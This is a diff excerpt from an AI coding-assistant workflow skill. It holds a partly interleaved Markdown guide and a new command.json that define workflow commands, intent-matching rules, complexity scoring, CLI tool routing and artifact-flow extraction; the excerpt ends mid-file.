│ └─────────┘ │
|
||||
│ │
|
||||
└─────────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
### Example 3: Complex Refactoring
|
||||
```
|
||||
User: 重构整个认证模块,迁移到 OAuth2
|
||||
CCW: Intent=feature, Complexity=high, Workflow=plan→verify→execute
|
||||
→ /workflow:plan "重构整个认证模块,迁移到 OAuth2"
|
||||
#### 命令列表
|
||||
|
||||
**积累阶段:**
|
||||
```bash
|
||||
/issue:discover # 多视角自动发现
|
||||
/issue:discover-by-prompt # 基于提示发现
|
||||
/issue:new # 手动创建
|
||||
```
|
||||
|
||||
### Example 4: Exploration
|
||||
```
|
||||
User: 我想优化系统性能,但不知道从哪入手
|
||||
CCW: Intent=exploration, Workflow=brainstorm→plan→execute
|
||||
→ /workflow:brainstorm:auto-parallel "探索系统性能优化方向"
|
||||
**批量解决阶段:**
|
||||
```bash
|
||||
/issue:plan --all-pending # 批量规划所有待处理
|
||||
/issue:queue # 生成优化执行队列
|
||||
/issue:execute # 并行执行
|
||||
```
|
||||
|
||||
### Example 5: Multi-Model Collaboration
|
||||
### lite-lite-lite vs multi-cli-plan
|
||||
|
||||
| 维度 | lite-lite-lite | multi-cli-plan |
|
||||
|------|---------------|----------------|
|
||||
| **产物** | 无文件 | IMPL_PLAN.md + plan.json + synthesis.json |
|
||||
| **状态** | 无状态 | 持久化 session |
|
||||
| **CLI选择** | 自动分析任务类型选择 | 配置驱动 |
|
||||
| **迭代** | 通过 AskUser | 多轮收敛 |
|
||||
| **执行** | 直接执行 | 通过 lite-execute |
|
||||
| **适用** | 快速修复、简单功能 | 复杂多步骤实现 |
|
||||
|
||||
**选择指南**:
|
||||
- 任务清晰、改动范围小 → `lite-lite-lite`
|
||||
- 需要多视角分析、复杂架构 → `multi-cli-plan`
|
||||
|
||||
### multi-cli-plan vs lite-plan
|
||||
|
||||
| 维度 | multi-cli-plan | lite-plan |
|
||||
|------|---------------|-----------|
|
||||
| **上下文** | ACE 语义搜索 | 手动文件模式 |
|
||||
| **分析** | 多 CLI 交叉验证 | 单次规划 |
|
||||
| **迭代** | 多轮直到收敛 | 单轮 |
|
||||
| **置信度** | 高 (共识驱动) | 中 (单一视角) |
|
||||
| **适用** | 需要多视角的复杂任务 | 直接明确的实现 |
|
||||
|
||||
**选择指南**:
|
||||
- 需求明确、路径清晰 → `lite-plan`
|
||||
- 需要权衡、多方案比较 → `multi-cli-plan`
|
||||
|
||||
## Artifact Flow Protocol
|
||||
|
||||
工作流产出的自动流转机制,支持不同格式产出间的意图提取和完成度判断。
|
||||
|
||||
### 产出格式
|
||||
|
||||
| 命令 | 产出位置 | 格式 | 关键字段 |
|
||||
|------|----------|------|----------|
|
||||
| `/workflow:lite-plan` | memory://plan | structured_plan | tasks, files, dependencies |
|
||||
| `/workflow:plan` | .workflow/{session}/IMPL_PLAN.md | markdown_plan | phases, tasks, risks |
|
||||
| `/workflow:execute` | execution_log.json | execution_report | completed_tasks, errors |
|
||||
| `/workflow:test-cycle-execute` | test_results.json | test_report | pass_rate, failures, coverage |
|
||||
| `/workflow:review-session-cycle` | review_report.md | review_report | findings, severity_counts |
|
||||
|
||||
### 意图提取 (Intent Extraction)
|
||||
|
||||
流转到下一步时,自动提取关键信息:
|
||||
|
||||
```
|
||||
User: 用 gemini 分析现有架构,然后让 codex 实现优化
|
||||
CCW: Detects tool preferences, executes in sequence
|
||||
→ Gemini CLI (analysis) → Codex CLI (implementation)
|
||||
plan → execute:
|
||||
提取: tasks (未完成), priority_order, files_to_modify, context_summary
|
||||
|
||||
execute → test:
|
||||
提取: modified_files, test_scope (推断), pending_verification
|
||||
|
||||
test → fix:
|
||||
条件: pass_rate < 0.95
|
||||
提取: failures, error_messages, affected_files, suggested_fixes
|
||||
|
||||
review → fix:
|
||||
条件: critical > 0 OR high > 3
|
||||
提取: findings (critical/high), fix_priority, affected_files
|
||||
```
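A sketch of the extraction step. The field names follow the lists above; the artifact shapes and the transition names other than `execute_to_test` (which appears in the usage example below) are assumptions:

```javascript
// Sketch: pull the listed fields out of the previous step's artifact.
function extractIntent(transition, artifact) {
  switch (transition) {
    case 'plan_to_execute':
      return { tasks: artifact.tasks.filter(t => !t.done), priority_order: artifact.priority_order,
               files_to_modify: artifact.files, context_summary: artifact.summary }
    case 'execute_to_test':
      return { modified_files: artifact.completed_tasks.flatMap(t => t.files ?? []),
               test_scope: 'inferred', pending_verification: artifact.errors ?? [] }
    case 'test_to_fix':
      return { failures: artifact.failures, error_messages: artifact.failures.map(f => f.message),
               affected_files: artifact.failures.map(f => f.file) }
    default:
      return {}
  }
}
```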
|
||||
|
||||
### 完成度判断
|
||||
|
||||
**Test 完成度路由**:
|
||||
```
|
||||
pass_rate >= 0.95 AND coverage >= 0.80 → complete
|
||||
pass_rate >= 0.95 AND coverage < 0.80 → add_more_tests
|
||||
pass_rate >= 0.80 → fix_failures_then_continue
|
||||
pass_rate < 0.80 → major_fix_required
|
||||
```
|
||||
|
||||
**Review 完成度路由**:
|
||||
```
|
||||
critical == 0 AND high <= 3 → complete_or_optional_fix
|
||||
critical > 0 → mandatory_fix
|
||||
high > 3 → recommended_fix
|
||||
```
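`evaluateCompletion` (used in the usage example further below) can encode both routing tables. A sketch with the thresholds above; the review result is assumed to carry `severity_counts` as listed in the artifact table:

```javascript
// Sketch of evaluateCompletion for the 'test' and 'review' routing rules above.
function evaluateCompletion(kind, result) {
  if (kind === 'test') {
    const { pass_rate, coverage } = result
    if (pass_rate >= 0.95 && coverage >= 0.80) return 'complete'
    if (pass_rate >= 0.95) return 'add_more_tests'
    if (pass_rate >= 0.80) return 'fix_failures_then_continue'
    return 'major_fix_required'
  }
  if (kind === 'review') {
    const { critical, high } = result.severity_counts
    if (critical > 0) return 'mandatory_fix'
    if (high > 3) return 'recommended_fix'
    return 'complete_or_optional_fix'
  }
  return 'complete'
}
```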
|
||||
|
||||
### 流转决策模式
|
||||
|
||||
**plan_execute_test**:
|
||||
```
|
||||
plan → execute → test
|
||||
↓ (if test fail)
|
||||
extract_failures → fix → test (max 3 iterations)
|
||||
↓ (if still fail)
|
||||
manual_intervention
|
||||
```
|
||||
|
||||
**iterative_improvement**:
|
||||
```
|
||||
execute → test → fix → test → ...
|
||||
loop until: pass_rate >= 0.95 OR iterations >= 3
|
||||
```
|
||||
|
||||
### 使用示例
|
||||
|
||||
```javascript
|
||||
// 执行完成后,根据产出决定下一步
|
||||
const result = await execute(plan)
|
||||
|
||||
// 提取意图流转到测试
|
||||
const testContext = extractIntent('execute_to_test', result)
|
||||
// testContext = { modified_files, test_scope, pending_verification }
|
||||
|
||||
// 测试完成后,根据完成度决定路由
|
||||
const testResult = await test(testContext)
|
||||
const nextStep = evaluateCompletion('test', testResult)
|
||||
// nextStep = 'fix_failures_then_continue' if pass_rate = 0.85
|
||||
```
|
||||
|
||||
## Reference
|
||||
|
||||
- [command.json](command.json) - command metadata, flow definitions, intent rules, artifact flow
|
||||
|
||||
641  .claude/skills/ccw/command.json  (new file)
@@ -0,0 +1,641 @@
|
||||
{
|
||||
"_metadata": {
|
||||
"version": "2.0.0",
|
||||
"description": "Unified CCW command index with capabilities, flows, and intent rules"
|
||||
},
|
||||
|
||||
"capabilities": {
|
||||
"explore": {
|
||||
"description": "Codebase exploration and context gathering",
|
||||
"commands": ["/workflow:init", "/workflow:tools:gather", "/memory:load"],
|
||||
"agents": ["cli-explore-agent", "context-search-agent"]
|
||||
},
|
||||
"brainstorm": {
|
||||
"description": "Multi-perspective analysis and ideation",
|
||||
"commands": ["/workflow:brainstorm:auto-parallel", "/workflow:brainstorm:artifacts", "/workflow:brainstorm:synthesis"],
|
||||
"roles": ["product-manager", "system-architect", "ux-expert", "data-architect", "api-designer"]
|
||||
},
|
||||
"plan": {
|
||||
"description": "Task planning and decomposition",
|
||||
"commands": ["/workflow:lite-plan", "/workflow:plan", "/workflow:tdd-plan", "/task:create", "/task:breakdown"],
|
||||
"agents": ["cli-lite-planning-agent", "action-planning-agent"]
|
||||
},
|
||||
"verify": {
|
||||
"description": "Plan and quality verification",
|
||||
"commands": ["/workflow:action-plan-verify", "/workflow:tdd-verify"]
|
||||
},
|
||||
"execute": {
|
||||
"description": "Task execution and implementation",
|
||||
"commands": ["/workflow:lite-execute", "/workflow:execute", "/task:execute"],
|
||||
"agents": ["code-developer", "cli-execution-agent", "universal-executor"]
|
||||
},
|
||||
"bugfix": {
|
||||
"description": "Bug diagnosis and fixing",
|
||||
"commands": ["/workflow:lite-fix"],
|
||||
"agents": ["code-developer"]
|
||||
},
|
||||
"test": {
|
||||
"description": "Test generation and execution",
|
||||
"commands": ["/workflow:test-gen", "/workflow:test-fix-gen", "/workflow:test-cycle-execute"],
|
||||
"agents": ["test-fix-agent"]
|
||||
},
|
||||
"review": {
|
||||
"description": "Code review and quality analysis",
|
||||
"commands": ["/workflow:review-session-cycle", "/workflow:review-module-cycle", "/workflow:review", "/workflow:review-fix"]
|
||||
},
|
||||
"issue": {
|
||||
"description": "Issue lifecycle management - discover, accumulate, batch resolve",
|
||||
"commands": ["/issue:new", "/issue:discover", "/issue:discover-by-prompt", "/issue:plan", "/issue:queue", "/issue:execute", "/issue:manage"],
|
||||
"agents": ["issue-plan-agent", "issue-queue-agent", "cli-explore-agent"],
|
||||
"lifecycle": {
|
||||
"accumulation": {
|
||||
"description": "任务完成后进行需求扩展、bug分析、测试发现",
|
||||
"triggers": ["post-task review", "code review findings", "test failures"],
|
||||
"commands": ["/issue:discover", "/issue:discover-by-prompt", "/issue:new"]
|
||||
},
|
||||
"batch_resolution": {
|
||||
"description": "积累的issue集中规划和并行执行",
|
||||
"flow": ["plan", "queue", "execute"],
|
||||
"commands": ["/issue:plan --all-pending", "/issue:queue", "/issue:execute"]
|
||||
}
|
||||
}
|
||||
},
|
||||
"ui-design": {
|
||||
"description": "UI design and prototyping",
|
||||
"commands": ["/workflow:ui-design:explore-auto", "/workflow:ui-design:imitate-auto", "/workflow:ui-design:design-sync"],
|
||||
"agents": ["ui-design-agent"]
|
||||
},
|
||||
"memory": {
|
||||
"description": "Documentation and knowledge management",
|
||||
"commands": ["/memory:docs", "/memory:update-related", "/memory:update-full", "/memory:skill-memory"],
|
||||
"agents": ["doc-generator", "memory-bridge"]
|
||||
}
|
||||
},
|
||||
|
||||
"flows": {
|
||||
"_level_guide": {
|
||||
"L1": "Rapid - No artifacts, direct execution",
|
||||
"L2": "Lightweight - Memory/lightweight files, → lite-execute",
|
||||
"L3": "Standard - Session persistence, → execute/test-cycle-execute",
|
||||
"L4": "Brainstorm - Multi-role analysis + Session, → execute"
|
||||
},
|
||||
"lite-lite-lite": {
|
||||
"name": "Ultra-Rapid Execution",
|
||||
"level": "L1",
|
||||
"description": "零文件 + 自动CLI选择 + 语义描述 + 直接执行",
|
||||
"complexity": ["low"],
|
||||
"artifacts": "none",
|
||||
"steps": [
|
||||
{ "phase": "clarify", "description": "需求澄清 (AskUser if needed)" },
|
||||
{ "phase": "auto-select", "description": "任务分析 → 自动选择CLI组合" },
|
||||
{ "phase": "multi-cli", "description": "并行多CLI分析" },
|
||||
{ "phase": "decision", "description": "展示结果 → AskUser决策" },
|
||||
{ "phase": "execute", "description": "直接执行 (无中间文件)" }
|
||||
],
|
||||
"cli_hints": {
|
||||
"analysis": { "tool": "auto", "mode": "analysis", "parallel": true },
|
||||
"execution": { "tool": "auto", "mode": "write" }
|
||||
},
|
||||
"estimated_time": "10-30 min"
|
||||
},
|
||||
"rapid": {
|
||||
"name": "Rapid Iteration",
|
||||
"level": "L2",
|
||||
"description": "内存规划 + 直接执行",
|
||||
"complexity": ["low", "medium"],
|
||||
"artifacts": "memory://plan",
|
||||
"steps": [
|
||||
{ "command": "/workflow:lite-plan", "optional": false, "auto_continue": true },
|
||||
{ "command": "/workflow:lite-execute", "optional": false }
|
||||
],
|
||||
"cli_hints": {
|
||||
"explore_phase": { "tool": "gemini", "mode": "analysis", "trigger": "needs_exploration" },
|
||||
"execution": { "tool": "codex", "mode": "write", "trigger": "complexity >= medium" }
|
||||
},
|
||||
"estimated_time": "15-45 min"
|
||||
},
|
||||
"multi-cli-plan": {
|
||||
"name": "Multi-CLI Collaborative Planning",
|
||||
"level": "L2",
|
||||
"description": "ACE上下文 + 多CLI协作分析 + 迭代收敛 + 计划生成",
|
||||
"complexity": ["medium", "high"],
|
||||
"artifacts": ".workflow/.multi-cli-plan/{session}/",
|
||||
"steps": [
|
||||
{ "command": "/workflow:multi-cli-plan", "optional": false, "phases": [
|
||||
"context_gathering: ACE语义搜索",
|
||||
"multi_cli_discussion: cli-discuss-agent多轮分析",
|
||||
"present_options: 展示解决方案",
|
||||
"user_decision: 用户选择",
|
||||
"plan_generation: cli-lite-planning-agent生成计划"
|
||||
]},
|
||||
{ "command": "/workflow:lite-execute", "optional": false }
|
||||
],
|
||||
"vs_lite_plan": {
|
||||
"context": "ACE semantic search vs Manual file patterns",
|
||||
"analysis": "Multi-CLI cross-verification vs Single-pass planning",
|
||||
"iteration": "Multiple rounds until convergence vs Single round",
|
||||
"confidence": "High (consensus-based) vs Medium (single perspective)",
|
||||
"best_for": "Complex tasks needing multiple perspectives vs Straightforward implementations"
|
||||
},
|
||||
"agents": ["cli-discuss-agent", "cli-lite-planning-agent"],
|
||||
"cli_hints": {
|
||||
"discussion": { "tools": ["gemini", "codex", "claude"], "mode": "analysis", "parallel": true },
|
||||
"planning": { "tool": "gemini", "mode": "analysis" }
|
||||
},
|
||||
"estimated_time": "30-90 min"
|
||||
},
|
||||
"coupled": {
|
||||
"name": "Standard Planning",
|
||||
"level": "L3",
|
||||
"description": "完整规划 + 验证 + 执行",
|
||||
"complexity": ["medium", "high"],
|
||||
"artifacts": ".workflow/active/{session}/",
|
||||
"steps": [
|
||||
{ "command": "/workflow:plan", "optional": false },
|
||||
{ "command": "/workflow:action-plan-verify", "optional": false, "auto_continue": true },
|
||||
{ "command": "/workflow:execute", "optional": false },
|
||||
{ "command": "/workflow:review", "optional": true }
|
||||
],
|
||||
"cli_hints": {
|
||||
"pre_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
|
||||
"execution": { "tool": "codex", "mode": "write", "trigger": "always" }
|
||||
},
|
||||
"estimated_time": "2-4 hours"
|
||||
},
|
||||
"full": {
|
||||
"name": "Full Exploration (Brainstorm)",
|
||||
"level": "L4",
|
||||
"description": "头脑风暴 + 规划 + 执行",
|
||||
"complexity": ["high"],
|
||||
"artifacts": ".workflow/active/{session}/.brainstorming/",
|
||||
"steps": [
|
||||
{ "command": "/workflow:brainstorm:auto-parallel", "optional": false, "confirm_before": true },
|
||||
{ "command": "/workflow:plan", "optional": false },
|
||||
{ "command": "/workflow:action-plan-verify", "optional": true, "auto_continue": true },
|
||||
{ "command": "/workflow:execute", "optional": false }
|
||||
],
|
||||
"cli_hints": {
|
||||
"role_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true },
|
||||
"execution": { "tool": "codex", "mode": "write", "trigger": "task_count >= 3" }
|
||||
},
|
||||
"estimated_time": "1-3 hours"
|
||||
},
|
||||
"bugfix": {
|
||||
"name": "Bug Fix",
|
||||
"level": "L2",
|
||||
"description": "智能诊断 + 修复 (5 phases)",
|
||||
"complexity": ["low", "medium"],
|
||||
"artifacts": ".workflow/.lite-fix/{bug-slug}-{date}/",
|
||||
"variants": {
|
||||
"standard": [{ "command": "/workflow:lite-fix", "optional": false }],
|
||||
"hotfix": [{ "command": "/workflow:lite-fix --hotfix", "optional": false }]
|
||||
},
|
||||
"phases": [
|
||||
"Phase 1: Bug Analysis & Diagnosis (severity pre-assessment)",
|
||||
"Phase 2: Clarification (optional, AskUserQuestion)",
|
||||
"Phase 3: Fix Planning (Low/Medium → Claude, High/Critical → cli-lite-planning-agent)",
|
||||
"Phase 4: Confirmation & Selection",
|
||||
"Phase 5: Execute (→ lite-execute --mode bugfix)"
|
||||
],
|
||||
"cli_hints": {
|
||||
"diagnosis": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
|
||||
"fix": { "tool": "codex", "mode": "write", "trigger": "severity >= medium" }
|
||||
},
|
||||
"estimated_time": "10-30 min"
|
||||
},
|
||||
"issue": {
|
||||
"name": "Issue Lifecycle",
|
||||
"level": "Supplementary",
|
||||
"description": "发现积累 → 批量规划 → 队列优化 → 并行执行 (Main Workflow 补充机制)",
|
||||
"complexity": ["medium", "high"],
|
||||
"artifacts": ".workflow/.issues/",
|
||||
"purpose": "Post-development continuous maintenance, maintain main branch stability",
|
||||
"phases": {
|
||||
"accumulation": {
|
||||
"description": "项目迭代中持续发现和积累issue",
|
||||
"commands": ["/issue:discover", "/issue:discover-by-prompt", "/issue:new"],
|
||||
"trigger": "post-task, code-review, test-failure"
|
||||
},
|
||||
"resolution": {
|
||||
"description": "集中规划和执行积累的issue",
|
||||
"steps": [
|
||||
{ "command": "/issue:plan --all-pending", "optional": false },
|
||||
{ "command": "/issue:queue", "optional": false },
|
||||
{ "command": "/issue:execute", "optional": false }
|
||||
]
|
||||
}
|
||||
},
|
||||
"worktree_support": {
|
||||
"description": "可选的 worktree 隔离,保持主分支稳定",
|
||||
"use_case": "主开发完成后的 issue 修复"
|
||||
},
|
||||
"cli_hints": {
|
||||
"discovery": { "tool": "gemini", "mode": "analysis", "trigger": "perspective_analysis", "parallel": true },
|
||||
"solution_generation": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true },
|
||||
"batch_execution": { "tool": "codex", "mode": "write", "trigger": "always" }
|
||||
},
|
||||
"estimated_time": "1-4 hours"
|
||||
},
|
||||
"tdd": {
|
||||
"name": "Test-Driven Development",
|
||||
"level": "L3",
|
||||
"description": "TDD规划 + 执行 + 验证 (6 phases)",
|
||||
"complexity": ["medium", "high"],
|
||||
"artifacts": ".workflow/active/{session}/",
|
||||
"steps": [
|
||||
{ "command": "/workflow:tdd-plan", "optional": false },
|
||||
{ "command": "/workflow:action-plan-verify", "optional": true, "auto_continue": true },
|
||||
{ "command": "/workflow:execute", "optional": false },
|
||||
{ "command": "/workflow:tdd-verify", "optional": false }
|
||||
],
|
||||
"tdd_structure": {
|
||||
"description": "Each IMPL task contains complete internal Red-Green-Refactor cycle",
|
||||
"meta": "tdd_workflow: true",
|
||||
"flow_control": "implementation_approach contains 3 steps (red/green/refactor)"
|
||||
},
|
||||
"cli_hints": {
|
||||
"test_strategy": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
|
||||
"red_green_refactor": { "tool": "codex", "mode": "write", "trigger": "always" }
|
||||
},
|
||||
"estimated_time": "1-3 hours"
|
||||
},
|
||||
"test-fix": {
|
||||
"name": "Test Fix Generation",
|
||||
"level": "L3",
|
||||
"description": "测试修复生成 + 执行循环 (5 phases)",
|
||||
"complexity": ["medium", "high"],
|
||||
"artifacts": ".workflow/active/WFS-test-{session}/",
|
||||
"dual_mode": {
|
||||
"session_mode": { "input": "WFS-xxx", "context_source": "Source session summaries" },
|
||||
"prompt_mode": { "input": "Text/file path", "context_source": "Direct codebase analysis" }
|
||||
},
|
||||
"steps": [
|
||||
{ "command": "/workflow:test-fix-gen", "optional": false },
|
||||
{ "command": "/workflow:test-cycle-execute", "optional": false }
|
||||
],
|
||||
"task_structure": [
|
||||
"IMPL-001.json (test understanding & generation)",
|
||||
"IMPL-001.5-review.json (quality gate)",
|
||||
"IMPL-002.json (test execution & fix cycle)"
|
||||
],
|
||||
"cli_hints": {
|
||||
"analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
|
||||
"fix_cycle": { "tool": "codex", "mode": "write", "trigger": "pass_rate < 0.95" }
|
||||
},
|
||||
"estimated_time": "1-2 hours"
|
||||
},
|
||||
"ui": {
|
||||
"name": "UI-First Development",
|
||||
"level": "L3/L4",
|
||||
"description": "UI设计 + 规划 + 执行",
|
||||
"complexity": ["medium", "high"],
|
||||
"artifacts": ".workflow/active/{session}/",
|
||||
"variants": {
|
||||
"explore": [
|
||||
{ "command": "/workflow:ui-design:explore-auto", "optional": false },
|
||||
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
|
||||
{ "command": "/workflow:plan", "optional": false },
|
||||
{ "command": "/workflow:execute", "optional": false }
|
||||
],
|
||||
"imitate": [
|
||||
{ "command": "/workflow:ui-design:imitate-auto", "optional": false },
|
||||
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
|
||||
{ "command": "/workflow:plan", "optional": false },
|
||||
{ "command": "/workflow:execute", "optional": false }
|
||||
]
|
||||
},
|
||||
"estimated_time": "2-4 hours"
|
||||
},
|
||||
"review-fix": {
|
||||
"name": "Review and Fix",
|
||||
"level": "L3",
|
||||
"description": "多维审查 + 自动修复",
|
||||
"complexity": ["medium"],
|
||||
"artifacts": ".workflow/active/{session}/review_report.md",
|
||||
"steps": [
|
||||
{ "command": "/workflow:review-session-cycle", "optional": false },
|
||||
{ "command": "/workflow:review-fix", "optional": true }
|
||||
],
|
||||
"cli_hints": {
|
||||
"multi_dimension_review": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true },
|
||||
"auto_fix": { "tool": "codex", "mode": "write", "trigger": "findings_count >= 3" }
|
||||
},
|
||||
"estimated_time": "30-90 min"
|
||||
},
|
||||
"docs": {
|
||||
"name": "Documentation",
|
||||
"level": "L2",
|
||||
"description": "批量文档生成",
|
||||
"complexity": ["low", "medium"],
|
||||
"variants": {
|
||||
"incremental": [{ "command": "/memory:update-related", "optional": false }],
|
||||
"full": [
|
||||
{ "command": "/memory:docs", "optional": false },
|
||||
{ "command": "/workflow:execute", "optional": false }
|
||||
]
|
||||
},
|
||||
"estimated_time": "15-60 min"
|
||||
}
|
||||
},
|
||||
|
||||
"intent_rules": {
|
||||
"_level_mapping": {
|
||||
"description": "Intent → Level → Flow mapping guide",
|
||||
"L1": ["lite-lite-lite"],
|
||||
"L2": ["rapid", "bugfix", "multi-cli-plan", "docs"],
|
||||
"L3": ["coupled", "tdd", "test-fix", "review-fix", "ui"],
|
||||
"L4": ["full"],
|
||||
"Supplementary": ["issue"]
|
||||
},
|
||||
"bugfix": {
|
||||
"priority": 1,
|
||||
"level": "L2",
|
||||
"variants": {
|
||||
"hotfix": {
|
||||
"patterns": ["hotfix", "urgent", "production", "critical", "emergency", "紧急", "生产环境", "线上"],
|
||||
"flow": "bugfix.hotfix"
|
||||
},
|
||||
"standard": {
|
||||
"patterns": ["fix", "bug", "error", "issue", "crash", "broken", "fail", "wrong", "修复", "错误", "崩溃"],
|
||||
"flow": "bugfix.standard"
|
||||
}
|
||||
}
|
||||
},
|
||||
"issue_batch": {
|
||||
"priority": 2,
|
||||
"level": "Supplementary",
|
||||
"patterns": {
|
||||
"batch": ["issues", "batch", "queue", "多个", "批量"],
|
||||
"action": ["fix", "resolve", "处理", "解决"]
|
||||
},
|
||||
"require_both": true,
|
||||
"flow": "issue"
|
||||
},
|
||||
"exploration": {
|
||||
"priority": 3,
|
||||
"level": "L4",
|
||||
"patterns": ["不确定", "不知道", "explore", "研究", "分析一下", "怎么做", "what if", "探索"],
|
||||
"flow": "full"
|
||||
},
|
||||
"multi_perspective": {
|
||||
"priority": 3,
|
||||
"level": "L2",
|
||||
"patterns": ["多视角", "权衡", "比较方案", "cross-verify", "多CLI", "协作分析"],
|
||||
"flow": "multi-cli-plan"
|
||||
},
|
||||
"quick_task": {
|
||||
"priority": 4,
|
||||
"level": "L1",
|
||||
"patterns": ["快速", "简单", "small", "quick", "simple", "trivial", "小改动"],
|
||||
"flow": "lite-lite-lite"
|
||||
},
|
||||
"ui_design": {
|
||||
"priority": 5,
|
||||
"level": "L3/L4",
|
||||
"patterns": ["ui", "界面", "design", "设计", "component", "组件", "style", "样式", "layout", "布局"],
|
||||
"variants": {
|
||||
"imitate": { "triggers": ["参考", "模仿", "像", "类似"], "flow": "ui.imitate" },
|
||||
"explore": { "triggers": [], "flow": "ui.explore" }
|
||||
}
|
||||
},
|
||||
"tdd": {
|
||||
"priority": 6,
|
||||
"level": "L3",
|
||||
"patterns": ["tdd", "test-driven", "测试驱动", "先写测试", "test first"],
|
||||
"flow": "tdd"
|
||||
},
|
||||
"test_fix": {
|
||||
"priority": 7,
|
||||
"level": "L3",
|
||||
"patterns": ["测试失败", "test fail", "fix test", "test error", "pass rate", "coverage gap"],
|
||||
"flow": "test-fix"
|
||||
},
|
||||
"review": {
|
||||
"priority": 8,
|
||||
"level": "L3",
|
||||
"patterns": ["review", "审查", "检查代码", "code review", "质量检查"],
|
||||
"flow": "review-fix"
|
||||
},
|
||||
"documentation": {
|
||||
"priority": 9,
|
||||
"level": "L2",
|
||||
"patterns": ["文档", "documentation", "docs", "readme"],
|
||||
"variants": {
|
||||
"incremental": { "triggers": ["更新", "增量"], "flow": "docs.incremental" },
|
||||
"full": { "triggers": ["全部", "完整"], "flow": "docs.full" }
|
||||
}
|
||||
},
|
||||
"feature": {
|
||||
"priority": 99,
|
||||
"complexity_map": {
|
||||
"high": { "level": "L3", "flow": "coupled" },
|
||||
"medium": { "level": "L2", "flow": "rapid" },
|
||||
"low": { "level": "L1", "flow": "lite-lite-lite" }
|
||||
}
|
||||
}
|
||||
},
|
||||
|
||||
"complexity_indicators": {
|
||||
"high": {
|
||||
"threshold": 4,
|
||||
"patterns": {
|
||||
"architecture": { "keywords": ["refactor", "重构", "migrate", "迁移", "architect", "架构", "system", "系统"], "weight": 2 },
|
||||
"multi_module": { "keywords": ["multiple", "多个", "across", "跨", "all", "所有", "entire", "整个"], "weight": 2 },
|
||||
"integration": { "keywords": ["integrate", "集成", "api", "database", "数据库"], "weight": 1 },
|
||||
"quality": { "keywords": ["security", "安全", "performance", "性能", "scale", "扩展"], "weight": 1 }
|
||||
}
|
||||
},
|
||||
"medium": { "threshold": 2 },
|
||||
"low": { "threshold": 0 }
|
||||
},
|
||||
|
||||
"cli_tools": {
|
||||
"gemini": {
|
||||
"strengths": ["超长上下文", "深度分析", "架构理解", "执行流追踪"],
|
||||
"triggers": ["分析", "理解", "设计", "架构", "诊断"],
|
||||
"mode": "analysis"
|
||||
},
|
||||
"qwen": {
|
||||
"strengths": ["代码模式识别", "多维度分析"],
|
||||
"triggers": ["评估", "对比", "验证"],
|
||||
"mode": "analysis"
|
||||
},
|
||||
"codex": {
|
||||
"strengths": ["精确代码生成", "自主执行"],
|
||||
"triggers": ["实现", "重构", "修复", "生成"],
|
||||
"mode": "write"
|
||||
}
|
||||
},
|
||||
|
||||
"cli_injection_rules": {
|
||||
"context_gathering": { "trigger": "file_read >= 50k OR module_count >= 5", "inject": "gemini --mode analysis" },
|
||||
"pre_planning_analysis": { "trigger": "complexity === high", "inject": "gemini --mode analysis" },
|
||||
"debug_diagnosis": { "trigger": "intent === bugfix AND root_cause_unclear", "inject": "gemini --mode analysis" },
|
||||
"code_review": { "trigger": "step === review", "inject": "gemini --mode analysis" },
|
||||
"implementation": { "trigger": "step === execute AND task_count >= 3", "inject": "codex --mode write" }
|
||||
},
|
||||
|
||||
"artifact_flow": {
|
||||
"_description": "定义工作流产出的格式、意图提取和流转规则",
|
||||
|
||||
"outputs": {
|
||||
"/workflow:lite-plan": {
|
||||
"artifact": "memory://plan",
|
||||
"format": "structured_plan",
|
||||
"fields": ["tasks", "files", "dependencies", "approach"]
|
||||
},
|
||||
"/workflow:plan": {
|
||||
"artifact": ".workflow/{session}/IMPL_PLAN.md",
|
||||
"format": "markdown_plan",
|
||||
"fields": ["phases", "tasks", "dependencies", "risks", "test_strategy"]
|
||||
},
|
||||
"/workflow:multi-cli-plan": {
|
||||
"artifact": ".workflow/.multi-cli-plan/{session}/",
|
||||
"format": "multi_file",
|
||||
"files": ["IMPL_PLAN.md", "plan.json", "synthesis.json"],
|
||||
"fields": ["consensus", "divergences", "recommended_approach", "tasks"]
|
||||
},
|
||||
"/workflow:lite-execute": {
|
||||
"artifact": "git_changes",
|
||||
"format": "code_diff",
|
||||
"fields": ["modified_files", "added_files", "deleted_files", "build_status"]
|
||||
},
|
||||
"/workflow:execute": {
|
||||
"artifact": ".workflow/{session}/execution_log.json",
|
||||
"format": "execution_report",
|
||||
"fields": ["completed_tasks", "pending_tasks", "errors", "warnings"]
|
||||
},
|
||||
"/workflow:test-cycle-execute": {
|
||||
"artifact": ".workflow/{session}/test_results.json",
|
||||
"format": "test_report",
|
||||
"fields": ["pass_rate", "failures", "coverage", "duration"]
|
||||
},
|
||||
"/workflow:review-session-cycle": {
|
||||
"artifact": ".workflow/{session}/review_report.md",
|
||||
"format": "review_report",
|
||||
"fields": ["findings", "severity_counts", "recommendations"]
|
||||
},
|
||||
"/workflow:lite-fix": {
|
||||
"artifact": "git_changes",
|
||||
"format": "fix_report",
|
||||
"fields": ["root_cause", "fix_applied", "files_modified", "verification_status"]
|
||||
}
|
||||
},
|
||||
|
||||
"intent_extraction": {
|
||||
"plan_to_execute": {
|
||||
"from": ["lite-plan", "plan", "multi-cli-plan"],
|
||||
"to": ["lite-execute", "execute"],
|
||||
"extract": {
|
||||
"tasks": "$.tasks[] | filter(status != 'completed')",
|
||||
"priority_order": "$.tasks | sort_by(priority)",
|
||||
"files_to_modify": "$.tasks[].files | flatten | unique",
|
||||
"dependencies": "$.dependencies",
|
||||
"context_summary": "$.approach OR $.recommended_approach"
|
||||
}
|
||||
},
|
||||
"execute_to_test": {
|
||||
"from": ["lite-execute", "execute"],
|
||||
"to": ["test-cycle-execute", "test-fix-gen"],
|
||||
"extract": {
|
||||
"modified_files": "$.modified_files",
|
||||
"test_scope": "infer_from($.modified_files)",
|
||||
"build_status": "$.build_status",
|
||||
"pending_verification": "$.completed_tasks | needs_test"
|
||||
}
|
||||
},
|
||||
"test_to_fix": {
|
||||
"from": ["test-cycle-execute"],
|
||||
